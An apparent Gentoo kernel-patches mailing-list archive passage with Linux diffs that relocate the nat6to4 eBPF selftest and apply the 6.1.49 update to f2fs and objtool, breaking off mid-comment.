+-	// Must be meta-ethernet IPv4 frame
+-	if (skb->protocol != bpf_htons(ETH_P_IP))
+-		return TC_ACT_OK;
+-
+-	// Must have ipv4 header
+-	if (data + l2_header_size + sizeof(struct ipv6hdr) > data_end)
+-		return TC_ACT_OK;
+-
+-	// Ethertype - if present - must be IPv4
+-	if (eth->h_proto != bpf_htons(ETH_P_IP))
+-		return TC_ACT_OK;
+-
+-	// IP version must be 4
+-	if (ip4->version != 4)
+-		return TC_ACT_OK;
+-
+-	// We cannot handle IP options, just standard 20 byte == 5 dword minimal IPv4 header
+-	if (ip4->ihl != 5)
+-		return TC_ACT_OK;
+-
+-	// Maximum IPv6 payload length that can be translated to IPv4
+-	if (bpf_htons(ip4->tot_len) > 0xFFFF - sizeof(struct ipv6hdr))
+-		return TC_ACT_OK;
+-
+-	// Calculate the IPv4 one's complement checksum of the IPv4 header.
+-	__wsum sum4 = 0;
+-
+-	for (int i = 0; i < sizeof(*ip4) / sizeof(__u16); ++i)
+-		sum4 += ((__u16 *)ip4)[i];
+-
+-	// Note that sum4 is guaranteed to be non-zero by virtue of ip4->version == 4
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
+-	// for a correct checksum we should get *a* zero, but sum4 must be positive, ie 0xFFFF
+-	if (sum4 != 0xFFFF)
+-		return TC_ACT_OK;
+-
+-	// Minimum IPv4 total length is the size of the header
+-	if (bpf_ntohs(ip4->tot_len) < sizeof(*ip4))
+-		return TC_ACT_OK;
+-
+-	// We are incapable of dealing with IPv4 fragments
+-	if (ip4->frag_off & ~bpf_htons(IP_DF))
+-		return TC_ACT_OK;
+-
+-	switch (ip4->protocol) {
+-	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
+-	case IPPROTO_GRE:  // address means there is no need to update their checksums.
+-	case IPPROTO_ESP:  // We do not need to bother looking at GRE/ESP headers,
+-		break;         // since there is never a checksum to update.
+-
+-	case IPPROTO_UDP:  // See above comment, but must also have UDP header...
+-		if (data + sizeof(*ip4) + sizeof(struct udphdr) > data_end)
+-			return TC_ACT_OK;
+-		const struct udphdr *uh = (const struct udphdr *)(ip4 + 1);
+-		// If IPv4/UDP checksum is 0 then fallback to clatd so it can calculate the
+-		// checksum.  Otherwise the network or more likely the NAT64 gateway might
+-		// drop the packet because in most cases IPv6/UDP packets with a zero checksum
+-		// are invalid. See RFC 6935.  TODO: calculate checksum via bpf_csum_diff()
+-		if (!uh->check)
+-			return TC_ACT_OK;
+-		break;
+-
+-	default:  // do not know how to handle anything else
+-		return TC_ACT_OK;
+-	}
+-	struct ethhdr eth2;  // used iff is_ethernet
+-
+-	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
+-	eth2.h_proto = bpf_htons(ETH_P_IPV6);  // But replace the ethertype
+-
+-	struct ipv6hdr ip6 = {
+-		.version = 6,                                    // __u8:4
+-		.priority = ip4->tos >> 4,                       // __u8:4
+-		.flow_lbl = {(ip4->tos & 0xF) << 4, 0, 0},       // __u8[3]
+-		.payload_len = bpf_htons(bpf_ntohs(ip4->tot_len) - 20),  // __be16
+-		.nexthdr = ip4->protocol,                        // __u8
+-		.hop_limit = ip4->ttl,                           // __u8
+-	};
+-	ip6.saddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
+-	ip6.saddr.in6_u.u6_addr32[1] = 0;
+-	ip6.saddr.in6_u.u6_addr32[2] = 0;
+-	ip6.saddr.in6_u.u6_addr32[3] = bpf_htonl(1);
+-	ip6.daddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
+-	ip6.daddr.in6_u.u6_addr32[1] = 0;
+-	ip6.daddr.in6_u.u6_addr32[2] = 0;
+-	ip6.daddr.in6_u.u6_addr32[3] = bpf_htonl(2);
+-
+-	// Calculate the IPv6 16-bit one's complement checksum of the IPv6 header.
+-	__wsum sum6 = 0;
+-	// We'll end up with a non-zero sum due to ip6.version == 6
+-	for (int i = 0; i < sizeof(ip6) / sizeof(__u16); ++i)
+-		sum6 += ((__u16 *)&ip6)[i];
+-
+-	// Packet mutations begin - point of no return, but if this first modification fails
+-	// the packet is probably still pristine, so let clatd handle it.
+-	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IPV6), 0))
+-		return TC_ACT_OK;
+-
+-	// This takes care of updating the skb->csum field for a CHECKSUM_COMPLETE packet.
+-	// In such a case, skb->csum is a 16-bit one's complement sum of the entire payload,
+-	// thus we need to subtract out the ipv4 header's sum, and add in the ipv6 header's sum.
+-	// However, we've already verified the ipv4 checksum is correct and thus 0.
+-	// Thus we only need to add the ipv6 header's sum.
+-	//
+-	// bpf_csum_update() always succeeds if the skb is CHECKSUM_COMPLETE and returns an error
+-	// (-ENOTSUPP) if it isn't.  So we just ignore the return code (see above for more details).
+-	bpf_csum_update(skb, sum6);
+-
+-	// bpf_skb_change_proto() invalidates all pointers - reload them.
+-	data = (void *)(long)skb->data;
+-	data_end = (void *)(long)skb->data_end;
+-
+-	// I cannot think of any valid way for this error condition to trigger, however I do
+-	// believe the explicit check is required to keep the in kernel ebpf verifier happy.
+-	if (data + l2_header_size + sizeof(ip6) > data_end)
+-		return TC_ACT_SHOT;
+-
+-	struct ethhdr *new_eth = data;
+-
+-	// Copy over the updated ethernet header
+-	*new_eth = eth2;
+-	// Copy over the new ipv4 header.
+-	*(struct ipv6hdr *)(new_eth + 1) = ip6;
+-	return TC_ACT_OK;
+-}
+-
+-char _license[] SEC("license") = ("GPL");
+diff --git a/tools/testing/selftests/net/nat6to4.c b/tools/testing/selftests/net/nat6to4.c
+new file mode 100644
+index 0000000000000..ac54c36b25fc8
+--- /dev/null
++++ b/tools/testing/selftests/net/nat6to4.c
+@@ -0,0 +1,285 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * This code is taken from the Android Open Source Project and the author
++ * (Maciej Żenczykowski) has gave permission to relicense it under the
++ * GPLv2. Therefore this program is free software;
++ * You can redistribute it and/or modify it under the terms of the GNU
++ * General Public License version 2 as published by the Free Software
++ * Foundation
++
++ * The original headers, including the original license headers, are
++ * included below for completeness.
++ *
++ * Copyright (C) 2019 The Android Open Source Project
++ *
++ * Licensed under the Apache License, Version 2.0 (the "License");
++ * you may not use this file except in compliance with the License.
++ * You may obtain a copy of the License at
++ *
++ *      http://www.apache.org/licenses/LICENSE-2.0
++ *
++ * Unless required by applicable law or agreed to in writing, software
++ * distributed under the License is distributed on an "AS IS" BASIS,
++ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
++ * See the License for the specific language governing permissions and
++ * limitations under the License.
++ */
++#include <linux/bpf.h>
++#include <linux/if.h>
++#include <linux/if_ether.h>
++#include <linux/if_packet.h>
++#include <linux/in.h>
++#include <linux/in6.h>
++#include <linux/ip.h>
++#include <linux/ipv6.h>
++#include <linux/pkt_cls.h>
++#include <linux/swab.h>
++#include <stdbool.h>
++#include <stdint.h>
++
++
++#include <linux/udp.h>
++
++#include <bpf/bpf_helpers.h>
++#include <bpf/bpf_endian.h>
++
++#define IP_DF 0x4000  // Flag: "Don't Fragment"
++
++SEC("schedcls/ingress6/nat_6")
++int sched_cls_ingress6_nat_6_prog(struct __sk_buff *skb)
++{
++	const int l2_header_size =  sizeof(struct ethhdr);
++	void *data = (void *)(long)skb->data;
++	const void *data_end = (void *)(long)skb->data_end;
++	const struct ethhdr * const eth = data;  // used iff is_ethernet
++	const struct ipv6hdr * const ip6 =  (void *)(eth + 1);
++
++	// Require ethernet dst mac address to be our unicast address.
++	if  (skb->pkt_type != PACKET_HOST)
++		return TC_ACT_OK;
++
++	// Must be meta-ethernet IPv6 frame
++	if (skb->protocol != bpf_htons(ETH_P_IPV6))
++		return TC_ACT_OK;
++
++	// Must have (ethernet and) ipv6 header
++	if (data + l2_header_size + sizeof(*ip6) > data_end)
++		return TC_ACT_OK;
++
++	// Ethertype - if present - must be IPv6
++	if (eth->h_proto != bpf_htons(ETH_P_IPV6))
++		return TC_ACT_OK;
++
++	// IP version must be 6
++	if (ip6->version != 6)
++		return TC_ACT_OK;
++	// Maximum IPv6 payload length that can be translated to IPv4
++	if (bpf_ntohs(ip6->payload_len) > 0xFFFF - sizeof(struct iphdr))
++		return TC_ACT_OK;
++	switch (ip6->nexthdr) {
++	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
++	case IPPROTO_UDP:  // address means there is no need to update their checksums.
++	case IPPROTO_GRE:  // We do not need to bother looking at GRE/ESP headers,
++	case IPPROTO_ESP:  // since there is never a checksum to update.
++		break;
++	default:  // do not know how to handle anything else
++		return TC_ACT_OK;
++	}
++
++	struct ethhdr eth2;  // used iff is_ethernet
++
++	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
++	eth2.h_proto = bpf_htons(ETH_P_IP);  // But replace the ethertype
++
++	struct iphdr ip = {
++		.version = 4,                                                      // u4
++		.ihl = sizeof(struct iphdr) / sizeof(__u32),                       // u4
++		.tos = (ip6->priority << 4) + (ip6->flow_lbl[0] >> 4),             // u8
++		.tot_len = bpf_htons(bpf_ntohs(ip6->payload_len) + sizeof(struct iphdr)),  // u16
++		.id = 0,                                                           // u16
++		.frag_off = bpf_htons(IP_DF),                                          // u16
++		.ttl = ip6->hop_limit,                                             // u8
++		.protocol = ip6->nexthdr,                                          // u8
++		.check = 0,                                                        // u16
++		.saddr = 0x0201a8c0,                            // u32
++		.daddr = 0x0101a8c0,                                         // u32
++	};
++
++	// Calculate the IPv4 one's complement checksum of the IPv4 header.
++	__wsum sum4 = 0;
++
++	for (int i = 0; i < sizeof(ip) / sizeof(__u16); ++i)
++		sum4 += ((__u16 *)&ip)[i];
++
++	// Note that sum4 is guaranteed to be non-zero by virtue of ip.version == 4
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
++	ip.check = (__u16)~sum4;                // sum4 cannot be zero, so this is never 0xFFFF
++
++	// Calculate the *negative* IPv6 16-bit one's complement checksum of the IPv6 header.
++	__wsum sum6 = 0;
++	// We'll end up with a non-zero sum due to ip6->version == 6 (which has '0' bits)
++	for (int i = 0; i < sizeof(*ip6) / sizeof(__u16); ++i)
++		sum6 += ~((__u16 *)ip6)[i];  // note the bitwise negation
++
++	// Note that there is no L4 checksum update: we are relying on the checksum neutrality
++	// of the ipv6 address chosen by netd's ClatdController.
++
++	// Packet mutations begin - point of no return, but if this first modification fails
++	// the packet is probably still pristine, so let clatd handle it.
++	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IP), 0))
++		return TC_ACT_OK;
++	bpf_csum_update(skb, sum6);
++
++	data = (void *)(long)skb->data;
++	data_end = (void *)(long)skb->data_end;
++	if (data + l2_header_size + sizeof(struct iphdr) > data_end)
++		return TC_ACT_SHOT;
++
++	struct ethhdr *new_eth = data;
++
++	// Copy over the updated ethernet header
++	*new_eth = eth2;
++
++	// Copy over the new ipv4 header.
++	*(struct iphdr *)(new_eth + 1) = ip;
++	return bpf_redirect(skb->ifindex, BPF_F_INGRESS);
++}
++
++SEC("schedcls/egress4/snat4")
++int sched_cls_egress4_snat4_prog(struct __sk_buff *skb)
++{
++	const int l2_header_size =  sizeof(struct ethhdr);
++	void *data = (void *)(long)skb->data;
++	const void *data_end = (void *)(long)skb->data_end;
++	const struct ethhdr *const eth = data;  // used iff is_ethernet
++	const struct iphdr *const ip4 = (void *)(eth + 1);
++
++	// Must be meta-ethernet IPv4 frame
++	if (skb->protocol != bpf_htons(ETH_P_IP))
++		return TC_ACT_OK;
++
++	// Must have ipv4 header
++	if (data + l2_header_size + sizeof(struct ipv6hdr) > data_end)
++		return TC_ACT_OK;
++
++	// Ethertype - if present - must be IPv4
++	if (eth->h_proto != bpf_htons(ETH_P_IP))
++		return TC_ACT_OK;
++
++	// IP version must be 4
++	if (ip4->version != 4)
++		return TC_ACT_OK;
++
++	// We cannot handle IP options, just standard 20 byte == 5 dword minimal IPv4 header
++	if (ip4->ihl != 5)
++		return TC_ACT_OK;
++
++	// Maximum IPv6 payload length that can be translated to IPv4
++	if (bpf_htons(ip4->tot_len) > 0xFFFF - sizeof(struct ipv6hdr))
++		return TC_ACT_OK;
++
++	// Calculate the IPv4 one's complement checksum of the IPv4 header.
++	__wsum sum4 = 0;
++
++	for (int i = 0; i < sizeof(*ip4) / sizeof(__u16); ++i)
++		sum4 += ((__u16 *)ip4)[i];
++
++	// Note that sum4 is guaranteed to be non-zero by virtue of ip4->version == 4
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
++	// for a correct checksum we should get *a* zero, but sum4 must be positive, ie 0xFFFF
++	if (sum4 != 0xFFFF)
++		return TC_ACT_OK;
++
++	// Minimum IPv4 total length is the size of the header
++	if (bpf_ntohs(ip4->tot_len) < sizeof(*ip4))
++		return TC_ACT_OK;
++
++	// We are incapable of dealing with IPv4 fragments
++	if (ip4->frag_off & ~bpf_htons(IP_DF))
++		return TC_ACT_OK;
++
++	switch (ip4->protocol) {
++	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
++	case IPPROTO_GRE:  // address means there is no need to update their checksums.
++	case IPPROTO_ESP:  // We do not need to bother looking at GRE/ESP headers,
++		break;         // since there is never a checksum to update.
++
++	case IPPROTO_UDP:  // See above comment, but must also have UDP header...
++		if (data + sizeof(*ip4) + sizeof(struct udphdr) > data_end)
++			return TC_ACT_OK;
++		const struct udphdr *uh = (const struct udphdr *)(ip4 + 1);
++		// If IPv4/UDP checksum is 0 then fallback to clatd so it can calculate the
++		// checksum.  Otherwise the network or more likely the NAT64 gateway might
++		// drop the packet because in most cases IPv6/UDP packets with a zero checksum
++		// are invalid. See RFC 6935.  TODO: calculate checksum via bpf_csum_diff()
++		if (!uh->check)
++			return TC_ACT_OK;
++		break;
++
++	default:  // do not know how to handle anything else
++		return TC_ACT_OK;
++	}
++	struct ethhdr eth2;  // used iff is_ethernet
++
++	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
++	eth2.h_proto = bpf_htons(ETH_P_IPV6);  // But replace the ethertype
++
++	struct ipv6hdr ip6 = {
++		.version = 6,                                    // __u8:4
++		.priority = ip4->tos >> 4,                       // __u8:4
++		.flow_lbl = {(ip4->tos & 0xF) << 4, 0, 0},       // __u8[3]
++		.payload_len = bpf_htons(bpf_ntohs(ip4->tot_len) - 20),  // __be16
++		.nexthdr = ip4->protocol,                        // __u8
++		.hop_limit = ip4->ttl,                           // __u8
++	};
++	ip6.saddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
++	ip6.saddr.in6_u.u6_addr32[1] = 0;
++	ip6.saddr.in6_u.u6_addr32[2] = 0;
++	ip6.saddr.in6_u.u6_addr32[3] = bpf_htonl(1);
++	ip6.daddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
++	ip6.daddr.in6_u.u6_addr32[1] = 0;
++	ip6.daddr.in6_u.u6_addr32[2] = 0;
++	ip6.daddr.in6_u.u6_addr32[3] = bpf_htonl(2);
++
++	// Calculate the IPv6 16-bit one's complement checksum of the IPv6 header.
++	__wsum sum6 = 0;
++	// We'll end up with a non-zero sum due to ip6.version == 6
++	for (int i = 0; i < sizeof(ip6) / sizeof(__u16); ++i)
++		sum6 += ((__u16 *)&ip6)[i];
++
++	// Packet mutations begin - point of no return, but if this first modification fails
++	// the packet is probably still pristine, so let clatd handle it.
++	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IPV6), 0))
++		return TC_ACT_OK;
++
++	// This takes care of updating the skb->csum field for a CHECKSUM_COMPLETE packet.
++	// In such a case, skb->csum is a 16-bit one's complement sum of the entire payload,
++	// thus we need to subtract out the ipv4 header's sum, and add in the ipv6 header's sum.
++	// However, we've already verified the ipv4 checksum is correct and thus 0.
++	// Thus we only need to add the ipv6 header's sum.
++	//
++	// bpf_csum_update() always succeeds if the skb is CHECKSUM_COMPLETE and returns an error
++	// (-ENOTSUPP) if it isn't.  So we just ignore the return code (see above for more details).
++	bpf_csum_update(skb, sum6);
++
++	// bpf_skb_change_proto() invalidates all pointers - reload them.
++	data = (void *)(long)skb->data;
++	data_end = (void *)(long)skb->data_end;
++
++	// I cannot think of any valid way for this error condition to trigger, however I do
++	// believe the explicit check is required to keep the in kernel ebpf verifier happy.
++	if (data + l2_header_size + sizeof(ip6) > data_end)
++		return TC_ACT_SHOT;
++
++	struct ethhdr *new_eth = data;
++
++	// Copy over the updated ethernet header
++	*new_eth = eth2;
++	// Copy over the new ipv4 header.
++	*(struct ipv6hdr *)(new_eth + 1) = ip6;
++	return TC_ACT_OK;
++}
++
++char _license[] SEC("license") = ("GPL");
+diff --git a/tools/testing/selftests/net/udpgro_frglist.sh b/tools/testing/selftests/net/udpgro_frglist.sh
+index c9c4b9d658390..0a6359bed0b92 100755
+--- a/tools/testing/selftests/net/udpgro_frglist.sh
++++ b/tools/testing/selftests/net/udpgro_frglist.sh
+@@ -40,8 +40,8 @@ run_one() {
+ 
+ 	ip -n "${PEER_NS}" link set veth1 xdp object ${BPF_FILE} section xdp
+ 	tc -n "${PEER_NS}" qdisc add dev veth1 clsact
+-	tc -n "${PEER_NS}" filter add dev veth1 ingress prio 4 protocol ipv6 bpf object-file ../bpf/nat6to4.o section schedcls/ingress6/nat_6  direct-action
+-	tc -n "${PEER_NS}" filter add dev veth1 egress prio 4 protocol ip bpf object-file ../bpf/nat6to4.o section schedcls/egress4/snat4 direct-action
++	tc -n "${PEER_NS}" filter add dev veth1 ingress prio 4 protocol ipv6 bpf object-file nat6to4.o section schedcls/ingress6/nat_6  direct-action
++	tc -n "${PEER_NS}" filter add dev veth1 egress prio 4 protocol ip bpf object-file nat6to4.o section schedcls/egress4/snat4 direct-action
+         echo ${rx_args}
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 
+@@ -88,8 +88,8 @@ if [ ! -f ${BPF_FILE} ]; then
+ 	exit -1
+ fi
+ 
+-if [ ! -f bpf/nat6to4.o ]; then
+-	echo "Missing nat6to4 helper. Build bpfnat6to4.o selftest first"
++if [ ! -f nat6to4.o ]; then
++	echo "Missing nat6to4 helper. Build bpf nat6to4.o selftest first"
+ 	exit -1
+ fi
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-27 21:41 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-27 21:41 UTC (permalink / raw
  To: gentoo-commits

commit:     1d1cf87e8d9001f2eaf9fb98557eead6934e4aaa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 27 21:41:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 27 21:41:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1d1cf87e

Linux patch 6.1.49

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1048_linux-6.1.49.patch | 292 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 296 insertions(+)

diff --git a/0000_README b/0000_README
index 0c66344f..6ce2c13b 100644
--- a/0000_README
+++ b/0000_README
@@ -235,6 +235,10 @@ Patch:  1047_linux-6.1.48.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.48
 
+Patch:  1048_linux-6.1.49.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.49
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1048_linux-6.1.49.patch b/1048_linux-6.1.49.patch
new file mode 100644
index 00000000..637a71c4
--- /dev/null
+++ b/1048_linux-6.1.49.patch
@@ -0,0 +1,292 @@
+diff --git a/Makefile b/Makefile
+index 8bb8dd199c552..61ebd54aba899 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 48
++SUBLEVEL = 49
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 78f39a78de29a..4d1e48c676fab 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3431,6 +3431,7 @@ static inline bool __is_valid_data_blkaddr(block_t blkaddr)
+  * file.c
+  */
+ int f2fs_sync_file(struct file *file, loff_t start, loff_t end, int datasync);
++void f2fs_truncate_data_blocks(struct dnode_of_data *dn);
+ int f2fs_do_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate(struct inode *inode);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 3ce6da4fac9c6..7b94f047cbf79 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -628,6 +628,11 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 					 dn->ofs_in_node, nr_free);
+ }
+ 
++void f2fs_truncate_data_blocks(struct dnode_of_data *dn)
++{
++	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
++}
++
+ static int truncate_partial_data_page(struct inode *inode, u64 from,
+ 								bool cache_only)
+ {
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 9fe502485930f..a010b4bc36d2c 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -923,7 +923,6 @@ static int truncate_node(struct dnode_of_data *dn)
+ 
+ static int truncate_dnode(struct dnode_of_data *dn)
+ {
+-	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+ 	struct page *page;
+ 	int err;
+ 
+@@ -931,25 +930,16 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 		return 1;
+ 
+ 	/* get direct node */
+-	page = f2fs_get_node_page(sbi, dn->nid);
++	page = f2fs_get_node_page(F2FS_I_SB(dn->inode), dn->nid);
+ 	if (PTR_ERR(page) == -ENOENT)
+ 		return 1;
+ 	else if (IS_ERR(page))
+ 		return PTR_ERR(page);
+ 
+-	if (IS_INODE(page) || ino_of_node(page) != dn->inode->i_ino) {
+-		f2fs_err(sbi, "incorrect node reference, ino: %lu, nid: %u, ino_of_node: %u",
+-				dn->inode->i_ino, dn->nid, ino_of_node(page));
+-		set_sbi_flag(sbi, SBI_NEED_FSCK);
+-		f2fs_handle_error(sbi, ERROR_INVALID_NODE_REFERENCE);
+-		f2fs_put_page(page, 1);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* Make dnode_of_data for parameter */
+ 	dn->node_page = page;
+ 	dn->ofs_in_node = 0;
+-	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
++	f2fs_truncate_data_blocks(dn);
+ 	err = truncate_node(dn);
+ 	if (err) {
+ 		f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index ff47aad636e5b..b6dad389fa144 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,12 +1347,6 @@ default_check:
+ 		return -EINVAL;
+ 	}
+ 
+-	if ((f2fs_sb_has_readonly(sbi) || f2fs_readonly(sbi->sb)) &&
+-		test_opt(sbi, FLUSH_MERGE)) {
+-		f2fs_err(sbi, "FLUSH_MERGE not compatible with readonly mode");
+-		return -EINVAL;
+-	}
+-
+ 	if (f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb)) {
+ 		f2fs_err(sbi, "Allow to mount readonly mode only");
+ 		return -EROFS;
+@@ -1939,10 +1933,8 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",inline_dentry");
+ 	else
+ 		seq_puts(seq, ",noinline_dentry");
+-	if (test_opt(sbi, FLUSH_MERGE))
++	if (!f2fs_readonly(sbi->sb) && test_opt(sbi, FLUSH_MERGE))
+ 		seq_puts(seq, ",flush_merge");
+-	else
+-		seq_puts(seq, ",noflush_merge");
+ 	if (test_opt(sbi, NOBARRIER))
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+@@ -2040,22 +2032,9 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 	return 0;
+ }
+ 
+-static void default_options(struct f2fs_sb_info *sbi, bool remount)
++static void default_options(struct f2fs_sb_info *sbi)
+ {
+ 	/* init some FS parameters */
+-	if (!remount) {
+-		set_opt(sbi, READ_EXTENT_CACHE);
+-		clear_opt(sbi, DISABLE_CHECKPOINT);
+-
+-		if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
+-			set_opt(sbi, DISCARD);
+-
+-		if (f2fs_sb_has_blkzoned(sbi))
+-			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
+-		else
+-			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
+-	}
+-
+ 	if (f2fs_sb_has_readonly(sbi))
+ 		F2FS_OPTION(sbi).active_logs = NR_CURSEG_RO_TYPE;
+ 	else
+@@ -2078,16 +2057,22 @@ static void default_options(struct f2fs_sb_info *sbi, bool remount)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
++	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
++	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+ 	F2FS_OPTION(sbi).unusable_cap = 0;
+ 	sbi->sb->s_flags |= SB_LAZYTIME;
+-	if (!f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb))
+-		set_opt(sbi, FLUSH_MERGE);
+-	if (f2fs_sb_has_blkzoned(sbi))
++	set_opt(sbi, FLUSH_MERGE);
++	if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
++		set_opt(sbi, DISCARD);
++	if (f2fs_sb_has_blkzoned(sbi)) {
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+-	else
++		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
++	} else {
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
++		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
++	}
+ 
+ #ifdef CONFIG_F2FS_FS_XATTR
+ 	set_opt(sbi, XATTR_USER);
+@@ -2259,7 +2244,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 			clear_sbi_flag(sbi, SBI_NEED_SB_WRITE);
+ 	}
+ 
+-	default_options(sbi, true);
++	default_options(sbi);
+ 
+ 	/* parse mount options */
+ 	err = parse_options(sb, data, true);
+@@ -4156,7 +4141,7 @@ try_onemore:
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+ 						sizeof(raw_super->uuid));
+ 
+-	default_options(sbi, false);
++	default_options(sbi);
+ 	/* parse mount options */
+ 	options = kstrdup((const char *)data, GFP_KERNEL);
+ 	if (data && !options) {
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index 77055b239165a..ee0d75d9a302d 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -104,7 +104,6 @@ enum f2fs_error {
+ 	ERROR_INCONSISTENT_SIT,
+ 	ERROR_CORRUPTED_VERITY_XATTR,
+ 	ERROR_CORRUPTED_XATTR,
+-	ERROR_INVALID_NODE_REFERENCE,
+ 	ERROR_MAX,
+ };
+ 
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index 29c35279c7ed8..1ed49ab4e871f 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -796,8 +796,11 @@ bool arch_is_retpoline(struct symbol *sym)
+ 
+ bool arch_is_rethunk(struct symbol *sym)
+ {
+-	return !strcmp(sym->name, "__x86_return_thunk") ||
+-	       !strcmp(sym->name, "srso_untrain_ret") ||
+-	       !strcmp(sym->name, "srso_safe_ret") ||
+-	       !strcmp(sym->name, "retbleed_return_thunk");
++	return !strcmp(sym->name, "__x86_return_thunk");
++}
++
++bool arch_is_embedded_insn(struct symbol *sym)
++{
++	return !strcmp(sym->name, "retbleed_return_thunk") ||
++	       !strcmp(sym->name, "srso_safe_ret");
+ }
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 913bd361c3684..f8008ab31eef0 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1164,16 +1164,33 @@ static int add_ignore_alternatives(struct objtool_file *file)
+ 	return 0;
+ }
+ 
++/*
++ * Symbols that replace INSN_CALL_DYNAMIC; every (tail) call to such a symbol
++ * will be added to the .retpoline_sites section.
++ */
+ __weak bool arch_is_retpoline(struct symbol *sym)
+ {
+ 	return false;
+ }
+ 
++/*
++ * Symbols that replace INSN_RETURN; every (tail) call to such a symbol
++ * will be added to the .return_sites section.
++ */
+ __weak bool arch_is_rethunk(struct symbol *sym)
+ {
+ 	return false;
+ }
+ 
++/*
++ * Symbols that are embedded inside other instructions, because sometimes crazy
